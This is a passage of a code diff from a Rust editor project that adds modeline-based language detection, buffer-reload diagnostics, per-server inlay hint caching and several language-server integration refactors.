Some(semantic_tokens) = &mut self.semantic_tokens { - semantic_tokens.raw_tokens.servers.remove(&for_server); - semantic_tokens - .latest_invalidation_requests - .remove(&for_server); + semantic_tokens.remove_server_data(for_server); } if let Some(folding_ranges) = &mut self.folding_ranges { @@ -4020,6 +4079,7 @@ pub enum LspStoreEvent { pub struct LanguageServerStatus { pub name: LanguageServerName, pub server_version: Option, + pub server_readable_version: Option, pub pending_work: BTreeMap, pub has_pending_diagnostic_updates: bool, pub progress_tokens: HashSet, @@ -4232,6 +4292,7 @@ impl LspStore { lsp_server_capabilities: HashMap::default(), semantic_token_config: SemanticTokenConfig::new(cx), lsp_data: HashMap::default(), + buffer_reload_tasks: HashMap::default(), next_hint_id: Arc::default(), active_entry: None, _maintain_workspace_config, @@ -4294,6 +4355,7 @@ impl LspStore { semantic_token_config: SemanticTokenConfig::new(cx), next_hint_id: Arc::default(), lsp_data: HashMap::default(), + buffer_reload_tasks: HashMap::default(), active_entry: None, _maintain_workspace_config, @@ -4351,7 +4413,9 @@ impl LspStore { this.update_local_worktree_language_servers(&worktree, changes, cx); } worktree::Event::UpdatedGitRepositories(_) - | worktree::Event::DeletedEntry(_) => {} + | worktree::Event::DeletedEntry(_) + | worktree::Event::Deleted + | worktree::Event::UpdatedRootRepoCommonDir => {} }) .detach() } @@ -4359,9 +4423,11 @@ impl LspStore { WorktreeStoreEvent::WorktreeUpdateSent(worktree) => { worktree.update(cx, |worktree, _cx| self.send_diagnostic_summaries(worktree)); } + WorktreeStoreEvent::WorktreeUpdatedEntries(worktree_id, changes) => { + self.invalidate_diagnostic_summaries_for_removed_entries(*worktree_id, changes, cx); + } WorktreeStoreEvent::WorktreeReleased(..) | WorktreeStoreEvent::WorktreeOrderChanged - | WorktreeStoreEvent::WorktreeUpdatedEntries(..) | WorktreeStoreEvent::WorktreeUpdatedGitRepositories(..) | WorktreeStoreEvent::WorktreeDeletedEntry(..) => {} } @@ -4418,7 +4484,7 @@ impl LspStore { cx: &mut Context, ) { match event { - language::BufferEvent::Edited => { + language::BufferEvent::Edited { .. } => { self.on_buffer_edited(buffer, cx); } @@ -4426,6 +4492,10 @@ impl LspStore { self.on_buffer_saved(buffer, cx); } + language::BufferEvent::Reloaded => { + self.on_buffer_reloaded(buffer, cx); + } + _ => {} } } @@ -4440,6 +4510,7 @@ impl LspStore { }) .detach(); + self.parse_modeline(buffer, cx); self.detect_language_for_buffer(buffer, cx); if let Some(local) = self.as_local_mut() { local.initialize_buffer(buffer, cx); @@ -4489,6 +4560,16 @@ impl LspStore { }) } + fn on_buffer_reloaded(&mut self, buffer: Entity, cx: &mut Context) { + if self.parse_modeline(&buffer, cx) { + self.detect_language_for_buffer(&buffer, cx); + } + + let buffer_id = buffer.read(cx).remote_id(); + let task = self.pull_diagnostics_for_buffer(buffer, cx); + self.buffer_reload_tasks.insert(buffer_id, task); + } + pub(crate) fn register_buffer_with_language_servers( &mut self, buffer: &Entity, @@ -4532,6 +4613,7 @@ impl LspStore { }; if refcount == 0 { lsp_store.lsp_data.remove(&buffer_id); + lsp_store.buffer_reload_tasks.remove(&buffer_id); let local = lsp_store.as_local_mut().unwrap(); local.registered_buffers.remove(&buffer_id); @@ -4711,6 +4793,56 @@ impl LspStore { }) } + fn parse_modeline(&mut self, buffer_handle: &Entity, cx: &mut Context) -> bool { + let buffer = buffer_handle.read(cx); + let content = buffer.as_rope(); + + let modeline_settings = { + let settings_store = cx.global::(); + let modeline_lines = settings_store + .raw_user_settings() + .and_then(|s| s.content.modeline_lines) + .or(settings_store.raw_default_settings().modeline_lines) + .unwrap_or(5); + + const MAX_MODELINE_BYTES: usize = 1024; + + let first_bytes = + content.clip_offset(content.len().min(MAX_MODELINE_BYTES), Bias::Left); + let mut first_lines = Vec::new(); + let mut lines = content.chunks_in_range(0..first_bytes).lines(); + for _ in 0..modeline_lines { + if let Some(line) = lines.next() { + first_lines.push(line.to_string()); + } else { + break; + } + } + let first_lines_ref: Vec<_> = first_lines.iter().map(|line| line.as_str()).collect(); + + let last_start = + content.clip_offset(content.len().saturating_sub(MAX_MODELINE_BYTES), Bias::Left); + let mut last_lines = Vec::new(); + let mut lines = content + .reversed_chunks_in_range(last_start..content.len()) + .lines(); + for _ in 0..modeline_lines { + if let Some(line) = lines.next() { + last_lines.push(line.to_string()); + } else { + break; + } + } + let last_lines_ref: Vec<_> = + last_lines.iter().rev().map(|line| line.as_str()).collect(); + modeline::parse_modeline(&first_lines_ref, &last_lines_ref) + }; + + log::debug!("Parsed modeline settings: {:?}", modeline_settings); + + buffer_handle.update(cx, |buffer, _cx| buffer.set_modeline(modeline_settings)) + } + fn detect_language_for_buffer( &mut self, buffer_handle: &Entity, @@ -4719,9 +4851,19 @@ impl LspStore { // If the buffer has a language, set it and start the language server if we haven't already. let buffer = buffer_handle.read(cx); let file = buffer.file()?; - let content = buffer.as_rope(); - let available_language = self.languages.language_for_file(file, Some(content), cx); + let modeline_settings = buffer.modeline().map(Arc::as_ref); + + let available_language = if let Some(ModelineSettings { + mode: Some(mode_name), + .. + }) = modeline_settings + { + self.languages + .available_language_for_modeline_name(mode_name) + } else { + self.languages.language_for_file(file, Some(content), cx) + }; if let Some(available_language) = &available_language { if let Some(Ok(Ok(new_language))) = self .languages @@ -4766,8 +4908,12 @@ impl LspStore { } }); - let settings = - language_settings(Some(new_language.name()), buffer_file.as_ref(), cx).into_owned(); + let settings = LanguageSettings::resolve( + Some(&buffer_entity.read(cx)), + Some(&new_language.name()), + cx, + ) + .into_owned(); let buffer_file = File::from_dyn(buffer_file.as_ref()); let worktree_id = if let Some(file) = buffer_file { @@ -4893,7 +5039,7 @@ impl LspStore { buffer: &Entity, mut check: F, cx: &App, - ) -> Vec + ) -> Vec<(lsp::LanguageServerId, lsp::LanguageServerName)> where F: FnMut(&lsp::LanguageServerName, &lsp::ServerCapabilities) -> bool, { @@ -4923,7 +5069,7 @@ impl LspStore { .map(|c| (server_id, server_name, c)) }) .filter(|(_, server_name, capabilities)| check(server_name, capabilities)) - .map(|(server_id, _, _)| *server_id) + .map(|(server_id, server_name, _)| (*server_id, server_name.clone())) .collect() } @@ -4999,10 +5145,6 @@ impl LspStore { }; let status = request.status(); - if !request.check_capabilities(language_server.adapter_server_capabilities()) { - return Task::ready(Ok(Default::default())); - } - let request_timeout = ProjectSettings::get_global(cx) .global_lsp_settings .get_request_timeout(); @@ -5079,10 +5221,9 @@ impl LspStore { let mut language_formatters_to_check = Vec::new(); for buffer in self.buffer_store.read(cx).buffers() { let buffer = buffer.read(cx); - let buffer_file = File::from_dyn(buffer.file()); - let buffer_language = buffer.language(); - let settings = language_settings(buffer_language.map(|l| l.name()), buffer.file(), cx); - if buffer_language.is_some() { + let settings = LanguageSettings::for_buffer(buffer, cx); + if buffer.language().is_some() { + let buffer_file = File::from_dyn(buffer.file()); language_formatters_to_check.push(( buffer_file.map(|f| f.worktree_id(cx)), settings.into_owned(), @@ -5104,6 +5245,10 @@ impl LspStore { .clone(); self.semantic_token_config .update_rules(new_semantic_token_rules); + // Always clear cached stylizers so that changes to language-specific + // semantic token rules (e.g. from extension install/uninstall) are + // picked up. Stylizers are recreated lazily, so this is cheap. + self.semantic_token_config.clear_stylizers(); let new_global_semantic_tokens_mode = all_language_settings(None, cx).defaults.semantic_tokens; @@ -5528,9 +5673,9 @@ impl LspStore { }) .filter(|_| { maybe!({ - let language = buffer.read(cx).language_at(position)?; + buffer.read(cx).language_at(position)?; Some( - language_settings(Some(language.name()), buffer.read(cx).file(), cx) + LanguageSettings::for_buffer_at(&buffer.read(cx), position, cx) .linked_edits, ) }) == Some(true) @@ -5634,12 +5779,7 @@ impl LspStore { ) -> Task>> { let options = buffer.update(cx, |buffer, cx| { lsp_command::lsp_formatting_options( - language_settings( - buffer.language_at(position).map(|l| l.name()), - buffer.file(), - cx, - ) - .as_ref(), + LanguageSettings::for_buffer_at(buffer, position, cx).as_ref(), ) }); @@ -6121,23 +6261,13 @@ impl LspStore { let language = buffer.read(cx).language().cloned(); - // In the future, we should provide project guests with the names of LSP adapters, - // so that they can use the correct LSP adapter when computing labels. For now, - // guests just use the first LSP adapter associated with the buffer's language. - let lsp_adapter = language.as_ref().and_then(|language| { - language_registry - .lsp_adapters(&language.name()) - .first() - .cloned() - }); - let buffer = buffer.clone(); cx.spawn(async move |this, cx| { let requests = join_all( capable_lsps .into_iter() - .map(|id| { + .map(|(id, server_name)| { let request = GetCompletions { position, context: context.clone(), @@ -6145,7 +6275,14 @@ impl LspStore { }; let buffer = buffer.clone(); let language = language.clone(); - let lsp_adapter = lsp_adapter.clone(); + let lsp_adapter = language.as_ref().and_then(|language| { + let adapters = language_registry.lsp_adapters(&language.name()); + adapters + .iter() + .find(|adapter| adapter.name() == server_name) + .or_else(|| adapters.first()) + .cloned() + }); let upstream_client = upstream_client.clone(); let response = this .update(cx, |this, cx| { @@ -6184,13 +6321,9 @@ impl LspStore { let offset = position.to_offset(&snapshot); let scope = snapshot.language_scope_at(offset); let language = snapshot.language().cloned(); - let completion_settings = language_settings( - language.as_ref().map(|language| language.name()), - buffer.read(cx).file(), - cx, - ) - .completions - .clone(); + let completion_settings = LanguageSettings::for_buffer(&buffer.read(cx), cx) + .completions + .clone(); if !completion_settings.lsp { return Task::ready(Ok(Vec::new())); } @@ -6638,6 +6771,7 @@ impl LspStore { completions: Rc>>, completion_index: usize, push_to_history: bool, + all_commit_ranges: Vec>, cx: &mut Context, ) -> Task>> { if let Some((client, project_id)) = self.upstream_client() { @@ -6654,6 +6788,11 @@ impl LspStore { new_text: completion.new_text, source: completion.source, })), + all_commit_ranges: all_commit_ranges + .iter() + .cloned() + .map(language::proto::serialize_anchor_range) + .collect(), } }; @@ -6747,12 +6886,15 @@ impl LspStore { let has_overlap = if is_file_start_auto_import { false } else { - let start_within = primary.start.cmp(&range.start, buffer).is_le() - && primary.end.cmp(&range.start, buffer).is_ge(); - let end_within = range.start.cmp(&primary.end, buffer).is_le() - && range.end.cmp(&primary.end, buffer).is_ge(); - let result = start_within || end_within; - result + all_commit_ranges.iter().any(|commit_range| { + let start_within = + commit_range.start.cmp(&range.start, buffer).is_le() + && commit_range.end.cmp(&range.start, buffer).is_ge(); + let end_within = + range.start.cmp(&commit_range.end, buffer).is_le() + && range.end.cmp(&commit_range.end, buffer).is_ge(); + start_within || end_within + }) }; //Skip additional edits which overlap with the primary completion edit @@ -7030,6 +7172,21 @@ impl LspStore { .collect() } else { for (chunk, range_to_query) in ranges_to_query.into_iter().flatten() { + // When a server refresh was requested, other servers' cached hints + // are unaffected by the refresh and must be included in the result. + // Otherwise apply_fetched_hints (with should_invalidate()=true) + // removes all visible hints but only adds back the requesting + // server's new hints, permanently losing other servers' hints. + let other_servers_cached: CacheInlayHints = if lsp_refresh_requested { + lsp_data + .inlay_hints + .cached_hints(&chunk) + .cloned() + .unwrap_or_default() + } else { + HashMap::default() + }; + let next_hint_id = next_hint_id.clone(); let buffer = buffer.clone(); let query_version = query_version.clone(); @@ -7048,33 +7205,32 @@ impl LspStore { if update_cache { lsp_data.inlay_hints.invalidate_for_chunk(chunk); } - HashMap::default() + other_servers_cached } else { - new_hints_by_server - .into_iter() - .map(|(server_id, new_hints)| { - let new_hints = new_hints - .into_iter() - .map(|new_hint| { - ( - InlayId::Hint(next_hint_id.fetch_add( - 1, - atomic::Ordering::AcqRel, - )), - new_hint, - ) - }) - .collect::>(); - if update_cache { - lsp_data.inlay_hints.insert_new_hints( - chunk, - server_id, - new_hints.clone(), - ); - } - (server_id, new_hints) - }) - .collect() + let mut result = other_servers_cached; + for (server_id, new_hints) in new_hints_by_server { + let new_hints = new_hints + .into_iter() + .map(|new_hint| { + ( + InlayId::Hint(next_hint_id.fetch_add( + 1, + atomic::Ordering::AcqRel, + )), + new_hint, + ) + }) + .collect::>(); + if update_cache { + lsp_data.inlay_hints.insert_new_hints( + chunk, + server_id, + new_hints.clone(), + ); + } + result.insert(server_id, new_hints); + } + result } }) }) @@ -8089,6 +8245,60 @@ impl LspStore { } } + fn invalidate_diagnostic_summaries_for_removed_entries( + &mut self, + worktree_id: WorktreeId, + changes: &UpdatedEntriesSet, + cx: &mut Context, + ) { + let Some(summaries_for_tree) = self.diagnostic_summaries.get_mut(&worktree_id) else { + return; + }; + + let mut cleared_paths: Vec = Vec::new(); + let mut cleared_server_ids: HashSet = HashSet::default(); + let downstream = self.downstream_client.clone(); + + for (path, _, _) in changes + .iter() + .filter(|(_, _, change)| *change == PathChange::Removed) + { + if let Some(summaries_by_server_id) = summaries_for_tree.remove(path) { + for (server_id, _) in &summaries_by_server_id { + cleared_server_ids.insert(*server_id); + if let Some((client, project_id)) = &downstream { + client + .send(proto::UpdateDiagnosticSummary { + project_id: *project_id, + worktree_id: worktree_id.to_proto(), + summary: Some(proto::DiagnosticSummary { + path: path.as_ref().to_proto(), + language_server_id: server_id.0 as u64, + error_count: 0, + warning_count: 0, + }), + more_summaries: Vec::new(), + }) + .ok(); + } + } + cleared_paths.push(ProjectPath { + worktree_id, + path: path.clone(), + }); + } + } + + if !cleared_paths.is_empty() { + for server_id in cleared_server_ids { + cx.emit(LspStoreEvent::DiagnosticsUpdated { + server_id, + paths: cleared_paths.clone(), + }); + } + } + } + pub fn shared( &mut self, project_id: u64, @@ -8173,6 +8383,7 @@ impl LspStore { LanguageServerStatus { name, server_version: None, + server_readable_version: None, pending_work: Default::default(), has_pending_diagnostic_updates: false, progress_tokens: Default::default(), @@ -9363,6 +9574,7 @@ impl LspStore { LanguageServerStatus { name: server_name.clone(), server_version: None, + server_readable_version: None, pending_work: Default::default(), has_pending_diagnostic_updates: false, progress_tokens: Default::default(), @@ -9805,7 +10017,9 @@ impl LspStore { let typ = match event.kind? { PathEventKind::Created => lsp::FileChangeType::CREATED, PathEventKind::Removed => lsp::FileChangeType::DELETED, - PathEventKind::Changed => lsp::FileChangeType::CHANGED, + PathEventKind::Changed | PathEventKind::Rescan => { + lsp::FileChangeType::CHANGED + } }; Some(lsp::FileEvent { uri: file_path_to_lsp_url(&event.path).log_err()?, @@ -10399,13 +10613,19 @@ impl LspStore { envelope: TypedEnvelope, mut cx: AsyncApp, ) -> Result { - let (buffer, completion) = this.update(&mut cx, |this, cx| { + let (buffer, completion, all_commit_ranges) = this.update(&mut cx, |this, cx| { let buffer_id = BufferId::new(envelope.payload.buffer_id)?; let buffer = this.buffer_store.read(cx).get_existing(buffer_id)?; let completion = Self::deserialize_completion( envelope.payload.completion.context("invalid completion")?, )?; - anyhow::Ok((buffer, completion)) + let all_commit_ranges = envelope + .payload + .all_commit_ranges + .into_iter() + .map(language::proto::deserialize_anchor_range) + .collect::, _>>()?; + anyhow::Ok((buffer, completion, all_commit_ranges)) })?; let apply_additional_edits = this.update(&mut cx, |this, cx| { @@ -10425,6 +10645,7 @@ impl LspStore { }]))), 0, false, + all_commit_ranges, cx, ) }); @@ -10739,6 +10960,7 @@ impl LspStore { } }); + let mut cleared_paths: Vec = Vec::new(); for (worktree_id, summaries) in self.diagnostic_summaries.iter_mut() { summaries.retain(|path, summaries_by_server_id| { if summaries_by_server_id.remove(&server_id).is_some() { @@ -10757,12 +10979,22 @@ impl LspStore { }) .log_err(); } + cleared_paths.push(ProjectPath { + worktree_id: *worktree_id, + path: path.clone(), + }); !summaries_by_server_id.is_empty() } else { true } }); } + if !cleared_paths.is_empty() { + cx.emit(LspStoreEvent::DiagnosticsUpdated { + server_id, + paths: cleared_paths, + }); + } let local = self.as_local_mut().unwrap(); for diagnostics in local.diagnostics.values_mut() { @@ -11023,23 +11255,6 @@ impl LspStore { cx.background_spawn(futures::future::join_all(tasks).map(|_| ())) } - fn get_buffer<'a>(&self, abs_path: &Path, cx: &'a App) -> Option<&'a Buffer> { - let (worktree, relative_path) = - self.worktree_store.read(cx).find_worktree(&abs_path, cx)?; - - let project_path = ProjectPath { - worktree_id: worktree.read(cx).id(), - path: relative_path, - }; - - Some( - self.buffer_store() - .read(cx) - .get_by_path(&project_path)? - .read(cx), - ) - } - #[cfg(any(test, feature = "test-support"))] pub fn update_diagnostics( &mut self, @@ -11319,6 +11534,7 @@ impl LspStore { LanguageServerStatus { name: language_server.name(), server_version: language_server.version(), + server_readable_version: language_server.readable_version(), pending_work: Default::default(), has_pending_diagnostic_updates: false, progress_tokens: Default::default(), @@ -11406,6 +11622,15 @@ impl LspStore { let buffer_id = buffer.remote_id(); if local.registered_buffers.contains_key(&buffer_id) { + let abs_path = file.abs_path(cx); + let uri = match lsp::Uri::from_file_path(&abs_path) { + Ok(uri) => uri, + Err(()) => { + log::error!("failed to convert path to URI: {:?}", abs_path); + continue; + } + }; + let versions = local .buffer_snapshots .entry(buffer_id) @@ -11427,14 +11652,13 @@ impl LspStore { let snapshot = versions.last().unwrap(); let version = snapshot.version; let initial_snapshot = &snapshot.snapshot; - let uri = lsp::Uri::from_file_path(file.abs_path(cx)).unwrap(); language_server.register_buffer( uri, adapter.language_id(&language.name()), version, initial_snapshot.text(), ); - buffer_paths_registered.push((buffer_id, file.abs_path(cx))); + buffer_paths_registered.push((buffer_id, abs_path)); local .buffers_opened_in_servers .entry(buffer_id) @@ -13964,6 +14188,7 @@ impl LspAdapter for SshLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _: &mut AsyncApp, ) -> Result> { let Some(options) = &self.initialization_options else { return Ok(None); @@ -14407,3 +14632,25 @@ pub fn ensure_uniform_list_compatible_label(label: &mut CodeLabel) { label.text = new_text; } + +/// Apply edits to the buffer that will become part of the formatting transaction. +/// Fails if the buffer has been edited since the start of that transaction. +fn extend_formatting_transaction( + buffer: &FormattableBuffer, + formatting_transaction_id: text::TransactionId, + cx: &mut AsyncApp, + operation: impl FnOnce(&mut Buffer, &mut Context), +) -> anyhow::Result<()> { + buffer.handle.update(cx, |buffer, cx| { + let last_transaction_id = buffer.peek_undo_stack().map(|t| t.transaction_id()); + if last_transaction_id != Some(formatting_transaction_id) { + anyhow::bail!("Buffer edited while formatting. Aborting") + } + buffer.start_transaction(); + operation(buffer, cx); + if let Some(transaction_id) = buffer.end_transaction(cx) { + buffer.merge_transactions(transaction_id, formatting_transaction_id); + } + Ok(()) + }) +} diff --git a/crates/project/src/lsp_store/json_language_server_ext.rs b/crates/project/src/lsp_store/json_language_server_ext.rs index 13c3aeb2b1ab2f4ab5f22a3cd065d4d0ff4bcb38..1f2fa0330b75deeb41342ae2401ddc8dbe05159c 100644 --- a/crates/project/src/lsp_store/json_language_server_ext.rs +++ b/crates/project/src/lsp_store/json_language_server_ext.rs @@ -42,8 +42,8 @@ impl lsp::notification::Notification for SchemaContentsChanged { type Params = String; } -pub fn notify_schema_changed(lsp_store: Entity, uri: String, cx: &App) { - zlog::trace!(LOGGER => "Notifying schema changed for URI: {:?}", uri); +pub fn notify_schemas_changed(lsp_store: Entity, uris: &[String], cx: &App) { + zlog::trace!(LOGGER => "Notifying schema changes for URIs: {:?}", uris); let servers = lsp_store.read_with(cx, |lsp_store, _| { let mut servers = Vec::new(); let Some(local) = lsp_store.as_local() else { @@ -63,16 +63,18 @@ pub fn notify_schema_changed(lsp_store: Entity, uri: String, cx: &App) servers }); for server in servers { - zlog::trace!(LOGGER => "Notifying server {NAME} (id {ID:?}) of schema change for URI: {uri:?}", - NAME = server.name(), - ID = server.server_id() - ); - if let Err(error) = server.notify::(uri.clone()) { - zlog::error!( - LOGGER => "Failed to notify server {NAME} (id {ID:?}) of schema change for URI {uri:?}: {error:#}", - NAME = server.name(), - ID = server.server_id(), + for uri in uris { + zlog::trace!(LOGGER => "Notifying server {NAME} (id {ID:?}) of schema change for URI: {uri:?}", + NAME = server.name(), + ID = server.server_id() ); + if let Err(error) = server.notify::(uri.clone()) { + zlog::error!( + LOGGER => "Failed to notify server {NAME} (id {ID:?}) of schema change for URI {uri:?}: {error:#}", + NAME = server.name(), + ID = server.server_id(), + ); + } } } } diff --git a/crates/project/src/lsp_store/lsp_ext_command.rs b/crates/project/src/lsp_store/lsp_ext_command.rs index 270db67576f0a02155997757a01d489d44ef1766..9c284a143613c47aa3a5fcc9af5afac9d6dbbf4d 100644 --- a/crates/project/src/lsp_store/lsp_ext_command.rs +++ b/crates/project/src/lsp_store/lsp_ext_command.rs @@ -211,10 +211,10 @@ impl LspCommand for OpenDocs { _: &Arc, _: &App, ) -> Result { + let uri = lsp::Uri::from_file_path(path) + .map_err(|()| anyhow::anyhow!("{path:?} is not a valid URI"))?; Ok(OpenDocsParams { - text_document: lsp::TextDocumentIdentifier { - uri: lsp::Uri::from_file_path(path).unwrap(), - }, + text_document: lsp::TextDocumentIdentifier { uri }, position: point_to_lsp(self.position), }) } diff --git a/crates/project/src/lsp_store/semantic_tokens.rs b/crates/project/src/lsp_store/semantic_tokens.rs index e71b05d47b0cf105429bf50648787fb1db2bad87..0f01c6350ece89569535dca571c28597ff77384b 100644 --- a/crates/project/src/lsp_store/semantic_tokens.rs +++ b/crates/project/src/lsp_store/semantic_tokens.rs @@ -12,8 +12,11 @@ use gpui::{App, AppContext, AsyncApp, Context, Entity, ReadGlobal as _, SharedSt use language::{Buffer, LanguageName, language_settings::all_language_settings}; use lsp::{AdapterServerCapabilities, LanguageServerId}; use rpc::{TypedEnvelope, proto}; -use settings::{SemanticTokenRule, SemanticTokenRules, Settings as _, SettingsStore}; +use settings::{ + DefaultSemanticTokenRules, SemanticTokenRule, SemanticTokenRules, Settings as _, SettingsStore, +}; use smol::future::yield_now; + use text::{Anchor, Bias, OffsetUtf16, PointUtf16, Unclipped}; use util::ResultExt as _; @@ -58,6 +61,15 @@ impl SemanticTokenConfig { } } + /// Clears all cached stylizers. + /// + /// This is called when settings change to ensure that any modifications to + /// language-specific semantic token rules (e.g. from extension install/uninstall) + /// are picked up. Stylizers are recreated lazily on next use. + pub(super) fn clear_stylizers(&mut self) { + self.stylizers.clear(); + } + pub(super) fn update_global_mode(&mut self, new_mode: settings::SemanticTokens) -> bool { if new_mode != self.global_mode { self.global_mode = new_mode; @@ -462,6 +474,7 @@ impl SemanticTokenStylizer { let global_rules = &ProjectSettings::get_global(cx) .global_lsp_settings .semantic_token_rules; + let default_rules = cx.global::(); let rules_by_token_type = token_types .iter() @@ -475,6 +488,7 @@ impl SemanticTokenStylizer { .rules .iter() .chain(language_rules.into_iter().flat_map(|lr| &lr.rules)) + .chain(default_rules.0.rules.iter()) .rev() .filter(filter) .cloned() @@ -571,8 +585,7 @@ async fn raw_to_buffer_semantic_tokens( } Some(BufferSemanticToken { - range: buffer_snapshot.anchor_before(start) - ..buffer_snapshot.anchor_after(end), + range: buffer_snapshot.anchor_range_inside(start..end), token_type: token.token_type, token_modifiers: token.token_modifiers, }) @@ -597,6 +610,14 @@ pub struct SemanticTokensData { update: Option<(Global, SemanticTokensTask)>, } +impl SemanticTokensData { + pub(super) fn remove_server_data(&mut self, server_id: LanguageServerId) { + self.raw_tokens.servers.remove(&server_id); + self.latest_invalidation_requests.remove(&server_id); + self.update = None; + } +} + /// All the semantic token tokens for a buffer. /// /// This aggregates semantic tokens from multiple language servers in a specific order. diff --git a/crates/project/src/manifest_tree.rs b/crates/project/src/manifest_tree.rs index 82dd1bc0d3fdd0149ced5ce3f2cf9ae480c9f2b7..fb1b7e96e4a20370493e0837360a28583ffbbfc0 100644 --- a/crates/project/src/manifest_tree.rs +++ b/crates/project/src/manifest_tree.rs @@ -59,6 +59,7 @@ impl WorktreeRoots { let path = TriePath::from(entry.path.as_ref()); this.roots.remove(&path); } + WorktreeEvent::Deleted | WorktreeEvent::UpdatedRootRepoCommonDir => {} } }), }) diff --git a/crates/project/src/prettier_store.rs b/crates/project/src/prettier_store.rs index 95150fda070e488cd9d6d43238c5aa99515aa271..b66f2d5e0c041e104cf109a48b6bad249b492b88 100644 --- a/crates/project/src/prettier_store.rs +++ b/crates/project/src/prettier_store.rs @@ -1,5 +1,5 @@ use std::{ - ops::ControlFlow, + ops::{ControlFlow, Range}, path::{Path, PathBuf}, sync::Arc, time::Duration, @@ -15,7 +15,7 @@ use futures::{ }; use gpui::{AppContext as _, AsyncApp, Context, Entity, EventEmitter, Task, WeakEntity}; use language::{ - Buffer, LanguageRegistry, LocalFile, + Buffer, LanguageRegistry, LocalFile, OffsetUtf16, language_settings::{Formatter, LanguageSettings}, }; use lsp::{LanguageServer, LanguageServerId, LanguageServerName}; @@ -736,6 +736,7 @@ pub fn prettier_plugins_for_language( pub(super) async fn format_with_prettier( prettier_store: &WeakEntity, buffer: &Entity, + range_utf16: Option>, cx: &mut AsyncApp, ) -> Option> { let prettier_instance = prettier_store @@ -772,7 +773,14 @@ pub(super) async fn format_with_prettier( }); let format_result = prettier - .format(buffer, buffer_path, ignore_dir, request_timeout, cx) + .format( + buffer, + buffer_path, + ignore_dir, + range_utf16, + request_timeout, + cx, + ) .await .with_context(|| format!("{} failed to format buffer", prettier_description)); diff --git a/crates/project/src/project.rs b/crates/project/src/project.rs index 9e37802213dfb8df5cf63af5648044ae8ec65ecb..0ec3366ca8f9f6c6e4e3cbd411e1894de4d0f2b8 100644 --- a/crates/project/src/project.rs +++ b/crates/project/src/project.rs @@ -33,7 +33,7 @@ pub mod search_history; pub mod yarn; use dap::inline_value::{InlineValueLocation, VariableLookupKind, VariableScope}; -use itertools::Either; +use itertools::{Either, Itertools}; use crate::{ git_store::GitStore, @@ -43,12 +43,11 @@ use crate::{ worktree_store::WorktreeIdCounter, }; pub use agent_registry_store::{AgentRegistryStore, RegistryAgent}; -pub use agent_server_store::{ - AgentServerStore, AgentServersUpdated, ExternalAgentServerName, ExternalAgentSource, -}; +pub use agent_server_store::{AgentId, AgentServerStore, AgentServersUpdated, ExternalAgentSource}; pub use git_store::{ ConflictRegion, ConflictSet, ConflictSetSnapshot, ConflictSetUpdate, git_traversal::{ChildEntriesGitIter, GitEntry, GitEntryRef, GitTraversal}, + linked_worktree_short_name, worktrees_directory_for_repo, }; pub use manifest_tree::ManifestTree; pub use project_search::{Search, SearchResults}; @@ -121,6 +120,7 @@ use std::{ borrow::Cow, collections::BTreeMap, ffi::OsString, + future::Future, ops::{Not as _, Range}, path::{Path, PathBuf}, pin::pin, @@ -135,6 +135,7 @@ use text::{Anchor, BufferId, OffsetRangeExt, Point, Rope}; use toolchain_store::EmptyToolchainStore; use util::{ ResultExt as _, maybe, + path_list::PathList, paths::{PathStyle, SanitizedPath, is_absolute}, rel_path::RelPath, }; @@ -149,6 +150,8 @@ pub use fs::*; pub use language::Location; #[cfg(any(test, feature = "test-support"))] pub use prettier::FORMAT_SUFFIX as TEST_PRETTIER_FORMAT_SUFFIX; +#[cfg(any(test, feature = "test-support"))] +pub use prettier::RANGE_FORMAT_SUFFIX as TEST_PRETTIER_RANGE_FORMAT_SUFFIX; pub use task_inventory::{ BasicContextProvider, ContextProviderWithTasks, DebugScenarioContext, Inventory, TaskContexts, TaskSourceKind, @@ -306,7 +309,7 @@ enum ProjectClientState { /// Multi-player mode but still a local project. Shared { remote_id: u64 }, /// Multi-player mode but working on a remote project. - Remote { + Collab { sharing_has_stopped: bool, capability: Capability, remote_id: u64, @@ -1029,6 +1032,8 @@ impl DirectoryLister { } } +pub const CURRENT_PROJECT_FEATURES: &[&str] = &["new-style-anchors"]; + #[cfg(feature = "test-support")] pub const DEFAULT_COMPLETION_CONTEXT: CompletionContext = CompletionContext { trigger_kind: lsp::CompletionTriggerKind::INVOKED, @@ -1185,7 +1190,6 @@ impl Project { worktree_store.clone(), environment.clone(), manifest_tree.clone(), - fs.clone(), cx, ) }); @@ -1226,12 +1230,23 @@ impl Project { ) }); + let git_store = cx.new(|cx| { + GitStore::local( + &worktree_store, + buffer_store.clone(), + environment.clone(), + fs.clone(), + cx, + ) + }); + let task_store = cx.new(|cx| { TaskStore::local( buffer_store.downgrade(), worktree_store.clone(), toolchain_store.read(cx).as_language_toolchain_store(), environment.clone(), + git_store.clone(), cx, ) }); @@ -1267,16 +1282,6 @@ impl Project { ) }); - let git_store = cx.new(|cx| { - GitStore::local( - &worktree_store, - buffer_store.clone(), - environment.clone(), - fs.clone(), - cx, - ) - }); - let agent_server_store = cx.new(|cx| { AgentServerStore::local( node.clone(), @@ -1411,30 +1416,6 @@ impl Project { ) }); - let task_store = cx.new(|cx| { - TaskStore::remote( - buffer_store.downgrade(), - worktree_store.clone(), - toolchain_store.read(cx).as_language_toolchain_store(), - remote.read(cx).proto_client(), - REMOTE_SERVER_PROJECT_ID, - cx, - ) - }); - - let settings_observer = cx.new(|cx| { - SettingsObserver::new_remote( - fs.clone(), - worktree_store.clone(), - task_store.clone(), - Some(remote_proto.clone()), - false, - cx, - ) - }); - cx.subscribe(&settings_observer, Self::on_settings_observer_event) - .detach(); - let context_server_store = cx.new(|cx| { ContextServerStore::remote( rpc::proto::REMOTE_SERVER_PROJECT_ID, @@ -1499,8 +1480,38 @@ impl Project { ) }); - let agent_server_store = - cx.new(|_| AgentServerStore::remote(REMOTE_SERVER_PROJECT_ID, remote.clone())); + let task_store = cx.new(|cx| { + TaskStore::remote( + buffer_store.downgrade(), + worktree_store.clone(), + toolchain_store.read(cx).as_language_toolchain_store(), + remote.read(cx).proto_client(), + REMOTE_SERVER_PROJECT_ID, + git_store.clone(), + cx, + ) + }); + + let settings_observer = cx.new(|cx| { + SettingsObserver::new_remote( + fs.clone(), + worktree_store.clone(), + task_store.clone(), + Some(remote_proto.clone()), + false, + cx, + ) + }); + cx.subscribe(&settings_observer, Self::on_settings_observer_event) + .detach(); + + let agent_server_store = cx.new(|_| { + AgentServerStore::remote( + REMOTE_SERVER_PROJECT_ID, + remote.clone(), + worktree_store.clone(), + ) + }); cx.subscribe(&remote, Self::on_remote_client_event).detach(); @@ -1637,6 +1648,10 @@ impl Project { project_id: remote_id, committer_email: committer.email, 